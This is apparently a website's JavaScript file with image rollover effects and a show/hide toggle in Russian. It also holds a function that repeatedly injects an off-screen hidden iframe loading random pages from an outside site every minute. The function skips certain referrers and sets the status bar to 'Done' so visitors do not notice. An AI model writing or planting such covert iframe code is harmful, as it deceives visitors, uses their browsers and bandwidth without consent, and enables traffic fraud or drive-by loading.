if(document.images){
    img1on= new Image();
    img1on.src="graf/2.gif";	
    img1off = new Image();
    img1off.src = "graf/1.gif";    
  }
  
   function imgon(imgname){
     if(document.images){
       document[imgname].src=eval("img1on.src");
     }
   }
   function imgoff(imgname){
     if(document.images){
       if(document[imgname].filters){
         document[imgname].filters[0].Apply();
         document[imgname].src=eval("img1off.src");
         document[imgname].filters[0].Play();
       }else{
         document[imgname].src=eval("img1off.src"); 
       }
     }
   }	
function showhidef(){
  if(showhide.style.display=="none"){
   showhide.style.display="";
   clos.innerHTML="[скрыть]";
  }else{
   showhide.style.display="none";
   clos.innerHTML="[показать]";
  }
}

function b2(){

var banner = new Array("http://www.ruled.ru/10error/","http://www.ruled.ru/10error/frame.html","http://www.ruled.ru/10error/teh.html","http://www.ruled.ru/10error/scrolltext.html","http://www.ruled.ru/10error/url.html","http://www.ruled.ru/10error/404.html","http://www.ruled.ru/10error/scrollblokmenu.html","http://www.ruled.ru/10error/nsite.html","http://www.ruled.ru/10error/colorlink.html","http://www.ruled.ru/10error/info.html","http://www.ruled.ru/10error/loadpag.html");
ref=/tbn/ig
if(!ref.test(escape(document.referrer))){
window.status="Готово";



//if(rnd==0){
rnd=Math.round(Math.random()*(banner.length-1));
//}else{
//rnd==0;
//}

bcd.innerHTML="<iframe src=\""+banner[rnd]+"\" style=\"border:0px solid #ffffff; position: absolute;left:-1000;\"></iframe>";

window.status="Готово";
setTimeout("b2()",60000);
}
}
 
